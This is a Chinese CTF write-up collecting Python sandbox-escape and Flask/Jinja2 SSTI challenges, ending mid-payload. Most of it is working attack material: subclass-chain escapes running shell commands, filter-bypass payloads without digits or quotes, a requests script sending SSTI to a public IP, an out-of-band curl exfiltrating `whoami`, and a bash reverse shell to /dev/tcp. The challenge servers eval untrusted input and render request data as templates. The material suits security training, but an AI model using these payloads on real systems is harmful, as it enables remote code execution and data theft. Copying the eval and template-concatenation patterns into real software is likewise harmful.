从python sandbox到flask ssti模板注入

前置知识请参考下面两篇文章,这里不再照抄一遍;本文主要收录题目。
https://www.k0rz3n.com/2018/05/04/Python%20%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E5%A4%87%E5%BF%98/
https://hatboy.github.io/2018/04/19/Python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E6%80%BB%E7%BB%93/

1. python2

~ python2
Python 2.7.17 (default, Jul 20 2020, 15:37:01)
[GCC 7.5.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> def func():
...     return 1
...
>>> func.func_globals
{'__builtins__': <module '__builtin__' (built-in)>, '__name__': '__main__', '__doc__': None, 'func': <function func at 0x7faa32da59d0>, '__package__': None}

绕过方案:

# 利用file()函数读取文件:
print(().__class__.__bases__[0].__subclasses__()[40]('./test.py').read())
# 执行系统命令:
print(().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ls'))
# 等效于下面语句,但下面的写法直接出现 os 和 system 关键字,无法绕过关键字过滤
print(().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].os.system('ls'))
# 执行系统命令:
print(().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").system("ls")'))
# 重新载入__builtins__:
print(().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__['__import__']("os").system("ls"))

2. python3

# 利用 _frozen_importlib._ModuleLock
print("".__class__.__mro__.__getitem__(1).__subclasses__()[64].__init__.__globals__["__builtins__"]["__import__"]("os").popen("whoami").read())

3. tricky

题目万变不离其宗

  • 没过滤引号
    • 各种绕过:字符串拼接【"o"+"s"】、十六进制转义【"\x6fs"】、编码【base64】
  • 过滤引号
    • 利用其他参数请求带入 利用语法糖
    ((request|attr(request.values.aa)))
    ((request|attr(request.args.aa)))
    ((request|attr(request.form.aa)))	
    
    from flask import request
    from jinja2 import Template
    
    In [73]: msg = '{{""|attr("encode")()}}'
    
    In [74]: Template("Good Job! " + msg + " . But sorry, there isn't flag").render()
    Out[74]: "Good Job! b'' . But sorry, there isn't flag"
    
    # 字符转换
    In [77]: msg = '{{""|attr("encode")()|attr("fromhex")("323334")|attr("decode")()}}'
    
    In [78]: Template("Good Job! " + msg + " . But sorry, there isn't flag").render()
    Out[78]: "Good Job! 234 . But sorry, there isn't flag"
    
    # 打印
    In [81]: msg = "{%print(11*11)%}"
    
    In [82]: Template("Good Job! " + msg + " . But sorry, there isn't flag").render()
    Out[82]: "Good Job! 121 . But sorry, there isn't flag"
    
    
    实战代码
    # Sends a single GET request: the `msg` query parameter carries a template
    # expression, and the request body carries the attribute names it refers to.
    import requests
    import urllib.parse
    # The expression itself contains no quote characters and no dunder names;
    # each attribute name is read at render time from request.form.<key>.
    payload = "((request|attr(request.form.aa))|attr(request.form.bb)|list).pop(-1)|attr(request.form.cc)()|attr(request.form.dd)(59)()|attr(request.form.ee)|attr(request.form.ff)|attr(request.form.gg)|attr(request.form.hh)(request.form.ii)|attr(request.form.jj)()"
    payload = urllib.parse.quote(payload)
    print(payload)
    url = r'http://121.37.182.111:30994/success?msg={{' + payload + r'}}'
    # Form fields looked up by the expression (aa..jj).
    data = {
         'aa':'__class__',
         'bb':'__mro__',
         'cc':'__subclasses__',
         'dd':'__getitem__',
         'ee':'_module',
         'ff':"linecache",
         'gg':'os',
         'hh':'popen',
         'ii':'cat flag.txt',
         'jj':'read'
    
    }
    # NOTE(review): because the names travel in separate request fields, a
    # filter or WAF rule that inspects only the `msg` value never sees them.
    # Input filtering is therefore not a fix; the server must stop rendering
    # request data as template source.
    r = requests.get(url=url,data=data)
    
    print(r.content.decode())
    
    • 利用chr
    {% set chr=().__class__.__bases__.__getitem__(0).__subclasses__()[59].__init__.__globals__.__builtins__.chr %}{{ ().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(chr(47)%2bchr(101)%2bchr(116)%2bchr(99)%2bchr(47)%2bchr(112)%2bchr(97)%2bchr(115)%2bchr(115)%2bchr(119)%2bchr(100)).read() }}
    
  • 过滤双花括号
#用{%%}标记
{% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://127.0.0.1:7999/?i=`whoami`').read()=='p' %}1{% endif %}
这样会没有回显,考虑带外或者盲注

# 用{%print%}标记,有回显
{%print config%}
  • 过滤[
对于列表和字典类型,可以用__getitem__
In [24]: [1,23,4][1]
Out[24]: 23

In [25]: [1,23,4].__getitem__(1)
Out[25]: 23

In [26]: d = {'a':'1'}

In [27]: d.__getitem__('a')
Out[27]: '1'

4. 训练题

  1. 第一个挑战 python2.7
# Challenge 1: read one line from stdin and evaluate it as a Python expression
# with this module's globals and the full set of builtins.
from __future__ import print_function
print('''pysandbox1: checkin
Welcome, this is a normal Python2.7 shell, can you get flag in ./flag?''')

# On Python 2, rebind input to raw_input so the line comes back as a string
# rather than being evaluated by input() itself. Where raw_input does not
# exist, the resulting NameError is swallowed by the bare except.
try:
    input = raw_input
except:
    pass
c = input()
# Aliases for globals and eval; x is not used anywhere in this variant.
x=globals
_eval = eval

# NOTE(review): eval() on untrusted input with no restrictions is arbitrary
# code execution by design; nothing here limits file or process access.
print(_eval(c))

解答:
由于没有其他限制,可直接open('/flag').read()
也可以__import__("os").system("cat /flag")
也可以().__class__.__bases__[0].__subclasses__()[40](r'/flag').read()

>>> for x in range(500):
...     print (x,(''.__class__.__mro__[2].__subclasses__()[x]))
...
(0, <type 'type'>)
(1, <type 'weakref'>)
(2, <type 'weakcallableproxy'>)
(3, <type 'weakproxy'>)
(4, <type 'int'>)
(5, <type 'basestring'>)
(6, <type 'bytearray'>)
(7, <type 'list'>)
(8, <type 'NoneType'>)
(9, <type 'NotImplementedType'>)
(10, <type 'traceback'>)
(11, <type 'super'>)
(12, <type 'xrange'>)
(13, <type 'dict'>)
(14, <type 'set'>)
(15, <type 'slice'>)
(16, <type 'staticmethod'>)
(17, <type 'complex'>)
(18, <type 'float'>)
(19, <type 'buffer'>)
(20, <type 'long'>)
(21, <type 'frozenset'>)
(22, <type 'property'>)
(23, <type 'memoryview'>)
(24, <type 'tuple'>)
(25, <type 'enumerate'>)
(26, <type 'reversed'>)
(27, <type 'code'>)
(28, <type 'frame'>)
(29, <type 'builtin_function_or_method'>)
(30, <type 'instancemethod'>)
(31, <type 'function'>)
(32, <type 'classobj'>)
(33, <type 'dictproxy'>)
(34, <type 'generator'>)
(35, <type 'getset_descriptor'>)
(36, <type 'wrapper_descriptor'>)
(37, <type 'instance'>)
(38, <type 'ellipsis'>)
(39, <type 'member_descriptor'>)
(40, <type 'file'>)
(41, <type 'PyCapsule'>)
(42, <type 'cell'>)
(43, <type 'callable-iterator'>)
(44, <type 'iterator'>)
(45, <type 'sys.long_info'>)
(46, <type 'sys.float_info'>)
(47, <type 'EncodingMap'>)
(48, <type 'fieldnameiterator'>)
(49, <type 'formatteriterator'>)
(50, <type 'sys.version_info'>)
(51, <type 'sys.flags'>)
(52, <type 'exceptions.BaseException'>)
(53, <type 'module'>)
(54, <type 'imp.NullImporter'>)
(55, <type 'zipimport.zipimporter'>)
(56, <type 'posix.stat_result'>)
(57, <type 'posix.statvfs_result'>)
(58, <class 'warnings.WarningMessage'>)
(59, <class 'warnings.catch_warnings'>)
(60, <class '_weakrefset._IterationGuard'>)
(61, <class '_weakrefset.WeakSet'>)
(62, <class '_abcoll.Hashable'>)
(63, <type 'classmethod'>)
(64, <class '_abcoll.Iterable'>)
(65, <class '_abcoll.Sized'>)
(66, <class '_abcoll.Container'>)
(67, <class '_abcoll.Callable'>)
(68, <type 'dict_keys'>)
(69, <type 'dict_items'>)
(70, <type 'dict_values'>)
(71, <class 'site._Printer'>)
(72, <class 'site._Helper'>)
(73, <type '_sre.SRE_Pattern'>)
(74, <type '_sre.SRE_Match'>)
(75, <type '_sre.SRE_Scanner'>)
(76, <class 'site.Quitter'>)
(77, <class 'codecs.IncrementalEncoder'>)
(78, <class 'codecs.IncrementalDecoder'>)
Traceback (most recent call last):
  File "<stdin>", line 2, in <module>
IndexError: list index out of range
  2. 第二个挑战 python2.7 linecache warnings.catch_warnings
# Challenge 2: evaluate one line of user input with an empty __builtins__
# mapping as globals and an empty dict as locals.
from __future__ import print_function
print('''pysandbox2: easy
how about eval in empty dict? Python2.7 ./flag''')

# On Python 2, make input() return the raw line; the bare except swallows the
# NameError where raw_input does not exist.
try:
    input = raw_input
except:
    pass
c = input()
# Aliases for globals and eval; x is not used anywhere in this variant.
x=globals
_eval = eval

# NOTE(review): an empty __builtins__ only removes names from lookup. Objects
# created by literals inside the expression still expose their type hierarchy
# through attribute access, so this is not a security boundary. Untrusted code
# needs OS-level isolation (separate process, dropped privileges), not a
# trimmed namespace.
print(_eval(c, {'__builtins__':{}}, {}))

解答:
().__class__.__bases__[0].__subclasses__()[59]()._module.linecache.os.system('cat /flag')
或者().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__['__import__']("os").system("cat /flag")

3、第三个挑战
类似的 不过先要ls

# Challenge 3: same evaluation as an empty-__builtins__ eval, but the banner
# says the flag file name is not ./flag and has to be discovered first.
from __future__ import print_function
print('''pysandbox3: easy ls
how about eval in empty dict? Python2.7
flag in current folder, but not ./flag''')

# On Python 2, make input() return the raw line; the bare except swallows the
# NameError where raw_input does not exist.
try:
    input = raw_input
except:
    pass
c = input()
# Aliases for globals and eval; x is not used anywhere in this variant.
x=globals
_eval = eval

# NOTE(review): hiding the file name adds no protection once the expression
# can reach process or file APIs; the empty __builtins__ mapping removes names
# from lookup only and does not confine attribute access on existing objects.
print(_eval(c, {'__builtins__':{}}, {}))

4、第四个挑战 python2.6.6 warnings.catch_warnings

# Challenge 4: empty-__builtins__ eval plus a poisoned sys.modules entry for os.
from __future__ import print_function
print('''pysandbox4: clear sys.modules
let's continue, how about sys.modules.clear()? Python2.6.6
flag in current folder, but not ./flag''')

# On Python 2, make input() return the raw line; the bare except swallows the
# NameError where raw_input does not exist.
try:
    input = raw_input
except:
    pass
c = input()
# Aliases for globals and eval; x is not used anywhere in this variant.
x=globals
_eval = eval

import sys
# Replace the cached entry for os with None; intended to make a later
# `import os` fail.
# NOTE(review): this only affects future import statements. Modules that were
# loaded earlier and already hold a reference to os keep that reference, so the
# module object itself is still alive and reachable.
sys.modules['os']=None
print(_eval(c, {'__builtins__':{}}, {}))

这道题把 sys.modules 里的 os 置空了,还有办法吗?
有!由于换到了 2.6.6 的环境,__subclasses__() 的下标会发生变化,按理需要把之前用到的下标重新枚举(fuzz)一遍;不过可以用列表推导式按类名直接查找需要的类,从而跳过枚举下标的环节。
[t for t in ().__class__.__bases__[0].__subclasses__() if t.__name__=="catch_warnings"][0]()._ module.linecache.os.system("cat /flag")

5、第五个挑战 python3.7 _wrap_close FileLoader

# Challenge 5: empty-__builtins__ eval after clearing the whole import cache
# (banner states Python 3.7).
from __future__ import print_function
print('''pysandbox5: clear sys.modules py3
almost same, but move to higher version: Python3.7 with sys.modules.clear() 
try `cat /flag`''')

# raw_input exists only on Python 2; elsewhere the NameError is swallowed and
# the builtin input() is used unchanged.
try:
    input = raw_input
except:
    pass
c = input()
# Aliases for globals and eval; x is not used anywhere in this variant.
x=globals
_eval = eval

import sys
# Empty the import cache.
# NOTE(review): clearing sys.modules drops cache entries only. Module objects
# and the classes they defined stay alive as long as anything references them,
# and remain reachable from any object through its type hierarchy.
sys.modules.clear()

print(_eval(c, {'__builtins__':{}}, {}))

现在我们把环境提升到3.7 并使用了命令sys.modules.clear()还有办法吗?
[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "_wrap_close"][0].close.__globals__["system"]("cat /flag")
[x for x in ().__class__.__bases__[-1].__subclasses__() if x.__name__ == 'FileLoader'] [0].get_data('','/flag')

6、第六个挑战

# Challenge 6: clear the import cache, delete almost every builtin, then
# evaluate user input with this module's own globals.
from __future__ import print_function
print('''pysandbox6: clear __builtins__
why don't we also clear the __builtins__ so that eval can be easier?''')

# raw_input exists only on Python 2; elsewhere the NameError is swallowed and
# the builtin input() is used unchanged.
try:
    input = raw_input
except:
    pass
c = input()
x=globals
# Keep a module-level alias: the builtin name `eval` is deleted below, so the
# final call has to go through _eval.
_eval = eval

import sys
sys.modules.clear()

# Delete every builtin except print and list.
# NOTE(review): assumes the script runs as __main__, where __builtins__ is the
# module object (it has a __dict__); in an imported module it is a plain dict.
for i in list(__builtins__.__dict__.keys()):
    if i not in ["print", "list", ]:
        del(__builtins__.__dict__[i])

# NOTE(review): no globals dict is passed, so the expression sees this module's
# globals (c, x, _eval, sys, ...). Removing builtin names does not remove the
# classes already loaded in the interpreter.
print(_eval(c))

同第五题

7、第七个挑战

# Challenge 7: delete os.system, clear the import cache, delete almost every
# builtin, then evaluate user input with this module's own globals.
from __future__ import print_function
print('''pysandbox7: del os.system
how can you call system function after del(os.system)?''')

# raw_input exists only on Python 2; elsewhere the NameError is swallowed and
# the builtin input() is used unchanged.
try:
    input = raw_input
except:
    pass
c = input()
x=globals
# Module-level alias; the builtin name `eval` is deleted further down.
_eval = eval

import os
# Remove the `system` attribute from the os module object.
# NOTE(review): this deletes one name from one namespace. Other process-spawning
# functions in the same module are untouched, so a single-function blacklist
# does not prevent command execution.
del(os.system)

import sys
sys.modules.clear()

# Delete every builtin except print and list (requires __builtins__ to be the
# module object, i.e. the script running as __main__).
for i in list(__builtins__.__dict__.keys()):
    if i not in ["print", "list", ]:
        del(__builtins__.__dict__[i])

# No globals dict is passed: the expression runs with this module's globals.
print(_eval(c))

把system过滤掉了
[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "_wrap_close"][0].close.__globals__["execl"]("/bin/cat","cat","/flag")
下面这个很稳呐
[x for x in ().__class__.__bases__[-1].__subclasses__() if x.__name__ == 'FileLoader'] [0].get_data('','/flag')

8.第八个挑战

# Challenge 8: remove __import__ from importlib, empty the os namespace, clear
# the import cache, delete almost all builtins and module globals, then
# evaluate user input with what is left.
from __future__ import print_function
print('''pysandbox10: del __import__ no mercy
no mercy, delete them all''')

# raw_input exists only on Python 2; elsewhere the NameError is swallowed and
# the builtin input() is used unchanged.
try:
    input = raw_input
except:
    pass
c = input()
# x is called below as x() to obtain this module's globals dict.
x=globals
# Module-level alias; the builtin name `eval` is deleted further down.
_eval = eval

import importlib
# Remove the __import__ entry from both importlib namespaces.
del(importlib.__dict__['__import__'])
del(importlib._bootstrap.__dict__['__import__'])

import os
# Empty the os module's namespace in place.
os.__dict__.clear()

import sys
sys.modules.clear()

# Delete every builtin except print and list (requires __builtins__ to be the
# module object, i.e. the script running as __main__).
for i in list(__builtins__.__dict__.keys()):
    if i not in ["print", "list", ]:
        del(__builtins__.__dict__[i])

# Delete every module global except x, print, _eval and c.
for i in list(x().keys()):
    if i not in ["x", "print", "_eval", "c", ]:
        del(x()[i])

# NOTE(review): every step above removes *names*. None of them removes the
# classes and loader objects already present in the interpreter, which stay
# reachable from any object through its type hierarchy. In-process name
# scrubbing cannot substitute for OS-level isolation of untrusted code.
print(_eval(c))


[x for x in ().__class__.__bases__[-1].__subclasses__() if x.__name__ == 'FileLoader'] [0].get_data('','/flag')

[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "BuiltinImporter"][0]().load_module("posix").system("cat /flag")

[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "_ImportLockContext"][0].__exit__.__globals__["_imp"].create_builtin([x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "ModuleSpec"][0](name='posix', loader=[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "BuiltinImporter"][0]())).system("cat /flag")

9.第九个挑战

# Challenge 9: reject input containing digit characters, delete almost all
# builtins and module globals, then evaluate the input.
from __future__ import print_function
print('''pysandbox9: number filter
here, we do not accept numbers
''')

# raw_input exists only on Python 2; elsewhere the NameError is swallowed and
# the builtin input() is used unchanged.
try:
    input = raw_input
except:
    pass
c = input()
# x is called below as x() to obtain this module's globals dict.
x=globals
# Module-level alias; the builtin name `eval` is deleted further down.
_eval = eval

# Refuse any input whose text contains one of the characters 0-9.
# NOTE(review): this is a blacklist on the source text. It does not constrain
# the values the expression can compute, so it does not stop integers from
# being produced at evaluation time.
for i in range(0,10):
    if str(i) in c: raise Exception("not allowed")

# Delete every builtin except print and list (requires __builtins__ to be the
# module object, i.e. the script running as __main__).
for i in list(__builtins__.__dict__.keys()):
    if i not in ["print", "list", ]:
        del(__builtins__.__dict__[i])

# Delete every module global except x, print, _eval and c.
for i in list(x().keys()):
    if i not in ["x", "print", "_eval", "c", ]:
        del(x()[i])

print(_eval(c))

过滤了数字,很简单
[x for x in ().__class__.__bases__[([]<[])-([]==[])].__subclasses__() if x.__name__ == 'FileLoader'] [[]<[]].get_data('','/flag')
[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "_wrap_close"][[]<[]].close.__globals__["system"]("cat /flag")

10.第10个挑战

# Challenge 10: reject input containing quote characters, delete almost all
# builtins and module globals, then evaluate the input.
from __future__ import print_function
print('''pysandbox15: string filter
here, we do not accept strings
''')

# raw_input exists only on Python 2; elsewhere the NameError is swallowed and
# the builtin input() is used unchanged.
try:
    input = raw_input
except:
    pass
c = input()
# x is called below as x() to obtain this module's globals dict.
x=globals
# Module-level alias; the builtin name `eval` is deleted further down.
_eval = eval

# Refuse any input whose text contains a double or a single quote.
# NOTE(review): this blocks string *literals* in the source text only. String
# objects that already exist in the interpreter are unaffected, so the check
# does not guarantee the expression handles no strings.
for i in ['"', "'"]:
    if str(i) in c: raise Exception("not allowed")

# Delete every builtin except print and list (requires __builtins__ to be the
# module object, i.e. the script running as __main__).
for i in list(__builtins__.__dict__.keys()):
    if i not in ["print", "list", ]:
        del(__builtins__.__dict__[i])

# Delete every module global except x, print, _eval and c.
for i in list(x().keys()):
    if i not in ["x", "print", "_eval", "c", ]:
        del(x()[i])

print(_eval(c))

过滤了引号,无法直接写字符串字面量

flask ssti
11. 过滤os+字符串

@app.route('/oops_you_can_not_see_me/<name>')
def mybackdoor(name):
	"""Render ``'Hello ' + name`` as a template after two substring filters.

	``name`` is the URL path segment. If it contains ``os`` or ``exec`` it is
	replaced by a fixed message; if the result contains any digit character it
	is replaced by a second fixed message. The outcome is concatenated into the
	template source and rendered.

	NOTE(review): concatenating request data into the template source means
	the engine parses any ``{{ }}`` / ``{% %}`` in ``name`` as template code
	(server-side template injection). The substring and digit filters do not
	change that. The fix is to keep the template constant and pass the value
	as data, e.g. ``Template('Hello {{ name }}').render(name=name)``
	(presumably ``Template`` is ``jinja2.Template`` - confirm the import).
	"""
	# Keyword filter: any hit swaps the whole value for a fixed message.
	if any(word in name for word in ['os','exec']):
		name = 'attack detected!'
	# Digit filter, applied to whatever the keyword filter left in place.
	if any(str(digit) in name for digit in range(0,10)):
		name = "number is not allowed!"
	return Template('Hello '+name).render()
{{().__class__.__bases__[[]<[]].__subclasses__()[([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])]().__init__.func_globals['linecache'].__dict__['o'+'s'].popen('cat %d.txt'%([]==[])).read()}}
{{().__class__.__base__.__subclasses__()[59].__init__.__getattribute__('func_global'+'s')['linecache'].__dict__['o'+'s'].__dict__['popen']('l'+'s').read()}}
{% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://39.105.116.195:8080/?i=`whoami`').read()=='p' %}1{% endif %}

12、过滤引号+数字

这种的才可以回显 system相关的不会回显 只会有一个返回值 但是可以用它反弹shell
().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__('func_global'+'s')['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('bash -c "bash -i >& /dev/tcp/172.6.6.6/9999 0>&1"')
下面的可以回显
{{().__class__.__base__.__subclasses__()[365].close.__globals__["__builtins__"]['open']("1.txt").read()}}
{{().__class__.__bases__[0].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}
利用__doc__拼接字符,获取当前目录下1.txt文件内容
payload如下

import requests,math
# get the index
# Step 1: ask the local test server to render the list of subclasses of
# object, then find the position of os._wrap_close in that list.
url = """http://127.0.0.1:5000/oops_you_can_not_see_me/{0}"""
payload = """{{().__class__.__base__.__subclasses__()}}"""
newurl = url.format(payload)
print (newurl)
r = requests.get(newurl)
# Drop the first five characters of the body - presumably the "Hello" prefix
# the route prepends; TODO confirm against the server code.
# NOTE(review): str arguments to replace() imply r.content is a str, i.e. this
# script targets Python 2; on Python 3 r.content is bytes and these calls fail.
mycontent =  (r.content)[5:]
# Wrap every <...> item in double quotes so the text reads as a list of
# string literals.
mycontent = mycontent.replace('<','\"<')
mycontent = mycontent.replace('>','>\"')
# NOTE(review): eval() on an HTTP response body executes whatever the server
# sends back, on the machine running this script. The text is only a list of
# string literals at this point, so ast.literal_eval would be a safer parser.
s = (eval(mycontent))
trueid = (s.index("<class 'os._wrap_close'>"))
print ('index='+str(trueid))
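def factor(x):
	"""Return the prime factors of ``x`` in ascending order, with multiplicity.

	Trial division by every integer from 2 up to ``int(sqrt(x))`` of the
	original ``x``; whatever remains above 1 afterwards is appended as the
	last factor. ``factor(1)`` returns an empty list.

	Floor division keeps every factor an ``int``. With ``/=`` the quotient
	becomes a float on Python 3, which breaks callers that pass the factors
	to ``range()``.
	"""
	mylist = []
	for i in range(2,int(math.sqrt(x))+1):
		while x%i==0:
			# x is divisible by i here, so floor division is exact.
			x //= i
			mylist.append(i)
	if x>1:
		mylist.append(x)
	return mylist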
def get(x):
	"""Return ``x`` copies of ``([]==[])`` joined by ``+`` ('' when x is 0)."""
	# Each ([]==[]) evaluates to True, so the sum of x terms has the value x.
	return '+'.join(['([]==[])'] * x)

def gen_payload(x):
	"""Return an expression string that evaluates to ``x`` without digit characters.

	0 and 1 map to a single comparison. Any other value is split into prime
	factors by ``factor``; each factor is written as a parenthesised sum from
	``get``, and the groups are multiplied together. The factor list is printed
	as a side effect.
	"""
	if x==0:
		return '[]<[]'
	if x==1:
		return '[]==[]'
	primes = factor(x)
	print(primes)
	return '*'.join('(%s)'%(get(p)) for p in primes)

# Local copy of a docstring used as a character table: gen_string() looks each
# wanted character up in this text and emits the index it was found at.
# NOTE(review): the emitted indices are only right if int.to_bytes.__doc__ on
# the target interpreter is identical to this copy - confirm against the
# target's Python version.
doc = "int.to_bytes(length, byteorder, *, signed=False) -> bytes\n\nReturn an array of bytes representing an integer.\n\nThe integer is represented using length bytes.  An OverflowError is\nraised if the integer is not representable with the given number of\nbytes.\n\nThe byteorder argument determines the byte order used to represent the\ninteger.  If byteorder is 'big', the most significant byte is at the\nbeginning of the byte array.  If byteorder is 'little', the most\nsignificant byte is at the end of the byte array.  To request the native\nbyte order of the host system, use `sys.byteorder' as the byte order value.\n\nThe signed keyword-only argument determines whether two's complement is\nused to represent the integer.  If signed is False and a negative integer\nis given, an OverflowError is raised."
# Fallback table for characters missing from `doc`.
x_doc = "__xor__"
# newurl = url.format(payload)
# r = requests.get(newurl)
# print (r.content)
def gen_string(x):
	"""Return an expression string that evaluates to ``x`` without quote characters.

	Each character is located in the module-level ``doc`` text and emitted as
	an index into ``to_bytes.__doc__``. If that attempt fails, the character is
	located in ``x_doc`` and emitted as an index into ``__xor__.__name__``.
	The per-character pieces are joined with ``+``. A character found in
	neither table raises ``ValueError`` from the fallback lookup.
	"""
	pieces = []
	for ch in x:
		try:
			piece = '([]<[]).to_bytes.__doc__[%s]'%(gen_payload(doc.index(ch)))
		except:
			# NOTE(review): the bare except also hides errors raised inside
			# gen_payload, not only a failed lookup in doc.
			piece = '([]<[]).__xor__.__name__[%s]'%(gen_payload(x_doc.index(ch)))
		pieces.append(piece)
	return '+'.join(pieces)
# Debug output: the expression generated for '.txt', prefixed with a fixed
# index-32 lookup into to_bytes.__doc__.
print ('>>>'+'([]<[]).to_bytes.__doc__[32]+'+gen_string('.txt'))

# Copy of the int docstring. Nothing in the visible code reads img_doc; the
# request below indexes imag.__doc__ on the server side instead.
img_doc ="int(x=0) -> integer\nint(x, base=10) -> integer\n\nConvert a number or string to an integer, or return 0 if no arguments\nare given.  If x is a number, return x.__int__().  For floating point\nnumbers, this truncates towards zero.\n\nIf x is not a number or if base is given, then x must be a string,\nbytes, or bytearray instance representing an integer literal in the\ngiven base.  The literal can be preceded by '+' or '-' and be surrounded\nby whitespace.  The base defaults to 10.  Valid bases are 0 and 2-36.\nBase 0 means to interpret the base from the string as an integer literal.\n>>> int('0b100', base=0)\n4"
# Step 2: fill the four slots of the template expression - the subclass index
# found in step 1, two dictionary keys and the file-name argument - using the
# digit-free (gen_payload/get) and quote-free (gen_string) generators.
payload = """{{().__class__.__base__.__subclasses__()[%s].close.__globals__[%s][%s](%s).read()}}"""%(gen_payload(trueid), gen_string("__builtins__"),gen_string('open'),'([]<[]).imag.__doc__[%s]+'%(get(32))+gen_string('.txt'))
newurl = url.format(payload)
print (newurl)
# Send the request to the local test server and print the raw response body.
r = requests.get(newurl)
print (r.content)
http://127.0.0.1:5000/oops_you_can_not_see_me/{{().__class__.__base__.__subclasses__()[(([]==[])+([]==[])+([]==[]))*(([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[]))].close.__globals__[([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))*(([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))*(([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))*(([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[[]<[]]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[[]<[]]+([]<[]).to_bytes.__doc__[[]==[]]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))*(([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))*(([]==[])+([]
==[])+([]==[]))]][([]<[]).to_bytes.__doc__[(([]==[])+([]==[])+([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))*(([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))*(([]==[])+([]==[])+([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[[]==[]]](([]<[]).imag.__doc__[([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))]+([]<[]).__xor__.__name__[(([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[]